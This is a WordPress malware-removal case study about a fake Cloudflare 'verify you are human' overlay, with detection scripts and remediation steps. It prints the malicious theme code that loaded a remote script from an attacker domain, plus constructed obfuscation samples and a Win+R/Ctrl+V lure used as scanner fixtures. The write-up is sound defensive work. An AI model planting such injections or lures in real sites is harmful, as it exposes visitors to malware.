WordPress Hacked: Fake Cloudflare “Verify You Are Human” — A WordPress Malware Removal Case Study

Published on 9/6/2025
MD Pabel

Summary: A client’s website was hacked. A fake Cloudflare “Verify you are human” page showed on their domain. I traced it to a malicious script https://digitalsheat[.]com/loader.js (also seen as digitalsheet[.]com/loader.js) loaded from the custom theme’s functions.php. The script added a full-screen iframe, asked users to press Win+R and Ctrl+V, and used a MutationObserver to persist. I removed the injection, cleaned the malware, checked the server, hardened security, and brought the site back the same day.

Figure: Fake Cloudflare page showing on the site’s domain.

What users saw

Visitors hit a full-page “Verify you are human” screen that blocked the real site.

Step 1 — Check the DOM (prove it is fake)

I opened DevTools → Elements. I saw the overlay HTML inside the page DOM (elements like checkbox-verify). Real Cloudflare checks do not ship as theme or plugin HTML.

Figure: Overlay elements present in the site’s DOM.

Step 2 — Watch the Network (no real verification)

I clicked the checkbox and watched DevTools → Network. The page sent no API/XHR calls to Cloudflare or the app. It only loaded static files. This is social engineering, not security.

Figure: The prompt tells users to press Win+R / Ctrl+V. A browser check never needs OS commands.

Step 3 — Review the admin (backdoor / fake plugins)

In wp-admin I spotted fake/backdoor plugins that looked like normal tools. Attackers often use these for persistence.

Figure: Suspicious fake plugins used as backdoors.

Step 4 — Hunt the payload (DevTools → Sources)

In Sources, I found an unknown loader.js. When I paused on exceptions, I saw obfuscated code with a MutationObserver. That is a strong persistence sign.

Figure: Obfuscated loader.js manipulating the page.

Step 5 — Confirm the external source (and the request)

Sources showed: digitalsheat[.]com/loader.js (also digitalsheet[.]com/loader.js).

Figure: External source confirmation.

Network confirmed the browser fetched the same script.

Figure: Network request confirmation.

The script loads from an attacker domain. They can change it any time.

Step 6 — Find the persistence in the custom theme

I searched the code for loader.js and wp_enqueue_script. I found this in the custom theme functions.php:


// Malicious enqueue found in the custom theme's functions.php.
// It registers a remote script that runs on every front-end page load.
function enqueue_custom_script() {
  wp_enqueue_script(
    'custom-error-script',                // innocuous-looking handle
    'https://digitalsheat.com/loader.js', // attacker-controlled source
    array(),                              // no dependencies
    null,                                 // no version string appended to the URL
    true                                  // load in the footer
  );
}
add_action('wp_enqueue_scripts', 'enqueue_custom_script');

I removed this code. The fake page disappeared.

Figure: Malicious enqueue inside the custom theme.
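To run the same search across a whole install instead of by hand, here is an added Python scanner (example code, not the author's tooling). It finds wp_enqueue_script / wp_register_script calls and raw <script src> tags whose host is not on an allowlist and reports file, line, URL and verdict. The allowlist, the example.com / example.net hosts and the sample theme files are constructed for the demo; the two known-bad hosts are the spellings named in this write-up.

```python
"""Find scripts enqueued or embedded from external hosts in a WordPress tree.

Added example, not the author's tooling. Scans .php/.html/.js files for
wp_enqueue_script / wp_register_script calls and raw <script src> tags whose
host is not on an allowlist. Sample theme files are constructed for the demo.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# Hosts allowed to serve scripts. example.com stands in for the site's own
# domain (assumption for the demo); anything else is reported for review.
ALLOWED_HOSTS = {"example.com", "www.example.com", "cdnjs.cloudflare.com"}
# Both spellings of the attacker host seen in this case.
KNOWN_BAD_HOSTS = {"digitalsheat.com", "digitalsheet.com"}

# wp_enqueue_script('handle', 'https://host/x.js', ...) with a literal URL.
# \s* spans newlines, so multi-line calls like the one in the theme are caught.
ENQUEUE_RE = re.compile(
    r"wp_(?:enqueue|register)_script\s*\(\s*['\"][^'\"]*['\"]\s*,\s*"
    r"['\"]((?:https?:)?//[^'\"]+)['\"]",
    re.IGNORECASE,
)
# Raw <script src="https://host/x.js"> in templates or HTML.
SCRIPT_TAG_RE = re.compile(
    r"<script[^>]*\ssrc\s*=\s*['\"]((?:https?:)?//[^'\"]+)['\"]", re.IGNORECASE
)

def classify(url):
    """known-bad / allowed / unknown, decided by host name only."""
    host = (urlparse(url).hostname or "").lower()
    if host in KNOWN_BAD_HOSTS:
        return "known-bad"
    if host in ALLOWED_HOSTS:
        return "allowed"
    return "unknown"

def scan_text(text, path="<string>"):
    """Return (path, line, url, verdict) for every non-allowed external script."""
    findings = []
    for rx in (ENQUEUE_RE, SCRIPT_TAG_RE):
        for m in rx.finditer(text):
            verdict = classify(m.group(1))
            if verdict != "allowed":
                line = text.count("\n", 0, m.start(1)) + 1  # line of the URL itself
                findings.append((path, line, m.group(1), verdict))
    return findings

def scan_tree(root, exts=(".php", ".html", ".js")):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), os.path.relpath(path, root)))
    return sorted(findings)

# Constructed sample theme: a normal local enqueue, the malicious remote one
# from this case, an allowed CDN tag and an unknown third-party tag.
SAMPLE_FUNCTIONS_PHP = """<?php
function theme_scripts() {
  wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js', array(), '1.0', true);
}
add_action('wp_enqueue_scripts', 'theme_scripts');

function enqueue_custom_script() {
  wp_enqueue_script(
    'custom-error-script',
    'https://digitalsheat.com/loader.js',
    array(),
    null,
    true
  );
}
add_action('wp_enqueue_scripts', 'enqueue_custom_script');
"""
SAMPLE_HEADER_PHP = """<!DOCTYPE html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://stats.example.net/t.js"></script>
</head>
"""

def demo():
    """Write the constructed theme to a temp dir, scan it, return findings."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "themes", "custom")
        os.makedirs(theme)
        for name, body in (("functions.php", SAMPLE_FUNCTIONS_PHP), ("header.php", SAMPLE_HEADER_PHP)):
            with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, line, url, verdict in demo():
        print(f"{verdict:10} {path}:{line}  {url}")
```

On a real install call scan_tree("/path/to/wp-content") with ALLOWED_HOSTS set to the site's own domain and the CDNs it actually uses; every "unknown" hit is something to explain, and a "known-bad" hit is the injection itself. Calls that build the URL from a variable rather than a literal are not matched, so this complements, rather than replaces, a look through functions.php by hand.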

What the malware does (plain language)

Overlay and throttle

  • On DOMContentLoaded, it creates a full-screen iframe (position: fixed; inset: 0; z-index: 2147483647).
  • It disables scroll (body.style.overflow='hidden').
  • It injects a base64 HTML template that looks like Cloudflare.
  • It stores a time stamp in localStorage so the overlay returns less often (about 24 hours). This hides patterns.

Push the user to run commands

  • It tells users to press Win+R and Ctrl+V.
  • This is MITRE ATT&CK T1204: User Execution. It tries to make the user run attacker commands.

Look legit and avoid noise

  • It skips some user agents (often mobile).
  • It uses the site’s domain/title and an icon to appear “native.”

Stay persistent

  • It uses wp_enqueue_scripts so it runs on every page load.
  • Because it loads from a remote domain, the attacker can swap payloads without touching your server again.

Indicators of Compromise (search these)

Domains / URLs

  • https://digitalsheat[.]com/loader.js
  • https://digitalsheet[.]com/loader.js (common variant)

WordPress hooks / function names

  • add_action('wp_enqueue_scripts','enqueue_custom_script');
  • wp_enqueue_script('custom-error-script','https://…/loader.js',…);

Obfuscated JavaScript signs

  • _0x-style names, array-rotation loops, atob(…) + TextDecoder, MutationObserver, full-screen iframe with very high z-index.
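The behaviours in the previous section and the signs listed here can be combined into a scoring rule, so that a single MutationObserver in a lazy-load library does not trip the alarm while the full pattern does. The scorer below is an added Python example, not the site's or the attacker's code. Its indicator weights and threshold are assumptions to tune against your own legitimate bundles, and both JavaScript samples are constructed: the first carries the indicators in inert form (no payload, nothing appended to the page), the second is an ordinary theme script.

```python
"""Score a JavaScript file for the overlay/obfuscation indicators listed above.

Added example, not the site's or the attacker's code. Each indicator is a set
of regexes that must all match; weights and threshold are assumptions for the
demo. Both samples are constructed.
"""
import re

INDICATORS = [
    # name, patterns (all must match), weight
    ("hex-names",         [re.compile(r"\b_0x[0-9a-f]{3,}\b", re.I)], 2),
    ("array-rotation",    [re.compile(r"\.push\(\s*\w+\.shift\(\)\s*\)")], 2),
    ("atob-textdecoder",  [re.compile(r"\batob\s*\("), re.compile(r"\bTextDecoder\b")], 2),
    ("mutation-observer", [re.compile(r"\bnew\s+MutationObserver\b")], 2),
    ("fullscreen-iframe", [re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)"),
                           re.compile(r"position\s*:\s*fixed", re.I)], 2),
    ("max-zindex",        [re.compile(r"z-?index\s*[:=]\s*['\"]?2147483647", re.I)], 3),
    ("scroll-lock",       [re.compile(r"overflow\s*=\s*['\"]hidden['\"]")], 1),
    ("localstorage-gate", [re.compile(r"localStorage\.setItem\("),
                           re.compile(r"Date\.now\(\)|\.getTime\(\)")], 2),
    ("winr-ctrlv",        [re.compile(r"Win\s*\+\s*R|Ctrl\s*\+\s*V", re.I)], 3),
]
# Assumption: a lone MutationObserver (weight 2) in a lazy-load library stays below this.
THRESHOLD = 6

def score_js(text):
    """Return (names of indicators that fired, total weight)."""
    hits = [name for name, pats, _ in INDICATORS if all(p.search(text) for p in pats)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    return hits, total

def verdict(text, threshold=THRESHOLD):
    hits, total = score_js(text)
    return {"hits": hits, "score": total, "suspicious": total >= threshold}

# Constructed: the indicator-bearing lines of a loader like the one described,
# with the payload and re-injection logic left out so the snippet does nothing.
SUSPICIOUS_SAMPLE = r"""
var _0x4f2a=['aWZyYW1l','Ym9keQ=='];(function(a,n){while(--n){a.push(a.shift());}})(_0x4f2a,0x1f);
document.addEventListener('DOMContentLoaded',function(){
  if(Date.now()-Number(localStorage.getItem('_cf_ts')||0)<86400000){return;}
  localStorage.setItem('_cf_ts',Date.now());
  var f=document.createElement('iframe');
  f.style.cssText='position:fixed;inset:0;z-index:2147483647;border:0';
  var tag=new TextDecoder().decode(Uint8Array.from(atob(_0x4f2a[0]),function(c){return c.charCodeAt(0);}));
  document.body.style.overflow='hidden';
  var msg='Press Win + R, then Ctrl + V';
  new MutationObserver(function(){}).observe(document.documentElement,{childList:true});
});
"""
# Constructed: an ordinary theme script (menu toggle plus a preference flag).
BENIGN_SAMPLE = r"""
document.addEventListener('DOMContentLoaded', function () {
  var toggle = document.querySelector('.menu-toggle');
  if (toggle) {
    toggle.addEventListener('click', function () {
      document.body.classList.toggle('menu-open');
    });
  }
  localStorage.setItem('theme', 'light');
});
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, verdict(sample))
```

Run verdict() over every .js file under wp-content (and over inline script blocks pulled from the rendered page) and review anything at or above the threshold. The benign sample sets a localStorage key too, which is why the localStorage indicator also requires a timestamp before it counts.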

Quick scans

grep -RniE "digitalshe[ae]t\.com|loader\.js|enqueue_custom_script|custom-error-script|_0x[0-9a-f]{3,}" wp-content

The digitalshe[ae]t\.com pattern covers both spellings of the attacker domain. loader.js and _0x-style names also occur in legitimate minified libraries, so review each hit before deleting anything.

Likely root cause

We did not see the first entry point in the evidence. The common causes are outdated or vulnerable plugins/themes, weak or reused passwords, exposed admin panels, or nulled components. The changed functions.php shows someone edited code after deployment.

Remediation I performed (short)

  1. Containment — I removed the malicious enqueue and all calls to digitalsheat[.]com/loader.js. I put the site in a brief maintenance window and disabled file editing in the dashboard.
  2. Clean & verify — I cleaned the infected files (functions.php, injected JS), removed fake/backdoor plugins, searched code and database for IoCs, updated WordPress core, plugins, and the custom theme, and checked that no executable files sit in writable folders (like uploads/).
  3. Server checks — I reviewed system and user crontabs and WP-Cron, audited processes and startup services, and checked .htaccess, .user.ini, and php.ini for auto_prepend_file / auto_append_file. I also verified SSH keys, users, file owners, and recent changes.
  4. Hardening — I enabled DISALLOW_FILE_EDIT, applied least-privilege permissions, rotated all passwords and AUTH_KEY/SALTS, turned on 2FA for admins, upgraded PHP to a supported version, added security headers, and enabled a trusted WAF with rate limits.
  5. Monitoring — I set up file-integrity monitoring and daily offsite backups. I added alerts for theme/plugin changes, new outbound JS domains, unusual logins, and error spikes.
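Steps 3 and 4 can be checked mechanically after the cleanup. The audit below is an added Python example, not the author's tooling: it scans .htaccess, .user.ini and php.ini for auto_prepend_file / auto_append_file directives (a way to pull a file into every PHP request), and checks wp-config.php for DISALLOW_FILE_EDIT and for keys/salts that are missing, still the install placeholder, or short. The sample config files and the prepend path in .user.ini are constructed for the demo.

```python
"""Audit wp-config.php and PHP/Apache config fragments for the items in
steps 3 and 4 above.

Added example, not the author's tooling. Sample files are constructed; the
prepend path in the .user.ini sample is a made-up placeholder.
"""
import os
import re
import tempfile

SALT_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
              "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"   # text shipped in wp-config-sample.php
CONFIG_FILES = (".htaccess", ".user.ini", "php.ini")

# define('NAME', value);  -> NAME, value  (quotes around value stripped below)
DEFINE_RE = re.compile(r"define\s*\(\s*['\"](\w+)['\"]\s*,\s*([^;]+?)\s*\)\s*;")
# Apache "php_value auto_prepend_file /p" or ini "auto_prepend_file = /p".
# A leading ';' or '#' fails the ^\s* anchor, so commented-out lines are skipped.
PREPEND_RE = re.compile(
    r"^\s*(?:php_(?:admin_)?value\s+)?(auto_(?:prepend|append)_file)\s*=?\s*(\S+)",
    re.I | re.M,
)

def parse_defines(php_text):
    return {m.group(1): m.group(2).strip().strip("'\"") for m in DEFINE_RE.finditer(php_text)}

def audit_wp_config(text):
    """Findings for DISALLOW_FILE_EDIT and the eight keys/salts."""
    defines = parse_defines(text)
    findings = []
    if defines.get("DISALLOW_FILE_EDIT", "").lower() != "true":
        findings.append("DISALLOW_FILE_EDIT is not true: dashboard file editor is enabled")
    for name in SALT_NAMES:
        value = defines.get(name, "")
        if not value or PLACEHOLDER in value.lower() or len(value) < 32:
            findings.append(f"{name} is missing, the placeholder, or short: rotate it")
    return findings

def audit_php_configs(root):
    """Findings for auto_prepend_file / auto_append_file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in CONFIG_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for m in PREPEND_RE.finditer(fh.read()):
                    value = m.group(2).strip("'\"")
                    if value.lower() not in ("", "none"):
                        findings.append(f"{os.path.relpath(path, root)}: {m.group(1)} = {value}")
    return sorted(findings)

# Constructed wp-config.php: editor not disabled, AUTH_KEY still the placeholder.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wp');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'K7m!q2Z$v9Lw@4Xp^c1Rt&8Yh*e5Nb3Jd6Fg-0Sa+2Vu=');
define('LOGGED_IN_KEY',    'Qw3e$R5t^Y7u*I9oP1aS2d-F4g+H6j=K8l_Z0x!C2v@B4n');
define('NONCE_KEY',        'Mn7b%V5c^X3z&A1s*D2fG4hJ6k-L8q+W0e=R2t_Y4u!I6o');
define('AUTH_SALT',        'Pl9o$K7i^J5u*H3yG1tF2r-D4e+S6w=A8q_Z0x!X2c@C4v');
define('SECURE_AUTH_SALT', 'Bn5v%C3x^Z1z&A2s*S4dD6fF8g-G0h+H2j=J4k_K6l!L8m');
define('LOGGED_IN_SALT',   'Rt4y$Y6u^U8i*I0oO2pP4a-A6s+S8d=D0f_F2g!G4h@H6j');
define('NONCE_SALT',       'Cv1b%B3n^N5m&M7q*Q9wW1eE3r-R5t+T7y=Y9u_U1i!I3o');
define('WP_DEBUG', false);
"""
# Constructed .user.ini with a live prepend (placeholder path) and a commented one.
SAMPLE_USER_INI = """; constructed sample .user.ini
upload_max_filesize = 64M
auto_prepend_file = /home/site/.cache/.x.php
; auto_append_file = /tmp/old.php
"""
SAMPLE_HTACCESS = """# BEGIN WordPress
RewriteEngine On
# END WordPress
"""

def demo():
    """Write the constructed files to a temp dir and return both audits."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in ((".user.ini", SAMPLE_USER_INI), (".htaccess", SAMPLE_HTACCESS)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {"wp_config": audit_wp_config(SAMPLE_WP_CONFIG),
                "php_configs": audit_php_configs(root)}

if __name__ == "__main__":
    for section, items in demo().items():
        print(section)
        for item in items or ["clean"]:
            print("  " + item)
```

For a real site, pass the document root to audit_php_configs() and the contents of wp-config.php to audit_wp_config(); the server-wide php.ini outside the web root needs the same check, since a prepend set there is not visible from inside wp-content.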

Result: The fake page vanished at once. The site made no further requests to the attacker domain. The site remains stable under monitoring.

Post-cleanup checks (quick list)

  • Network: no calls to digitalsheat[.]com/loader.js or digitalsheet[.]com/loader.js.
  • Elements / Sources: no overlay or injector code.
  • localStorage: no overlay keys.
  • Fresh devices/sessions: real site loads every time.

How to remove malware from a WordPress site (action guide)

  1. Do not follow any Win+R / Ctrl+V prompts.
  2. Open DevTools → Network, reload, and look for unknown external JavaScript.
  3. Check the theme functions.php and mu-plugins for strange wp_enqueue_script calls.
  4. Remove the malware, update WordPress core, plugins, and the theme, and delete what you don’t use.
  5. Rotate all passwords and refresh salts; enable MFA.
  6. Add a WordPress firewall and security tool; enable file-integrity monitoring and tested backups.

Results (business value)

  • Fast recovery — I restored the site the same day.
  • Threat removed — No more calls to attacker domains.
  • Stronger security — Updates, MFA, least privilege, and monitoring are now in place.

Professional WordPress Malware Removal Service

If your WordPress site has been compromised or you suspect malware infection, don’t risk your business reputation and data. I provide comprehensive WordPress malware removal services that include:

  • Complete malware detection and removal
  • Security vulnerability assessment
  • Website hardening and protection
  • Backup and recovery solutions
  • Ongoing monitoring and maintenance

Get your website cleaned and secured by a professional. Learn more about my WordPress Malware Removal service and protect your online presence today.

About the Author

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With over 7 years of experience, he has completed more than 3200 projects, served more than 2300 clients, and resolved more than 4500 cases of malware and hacked websites.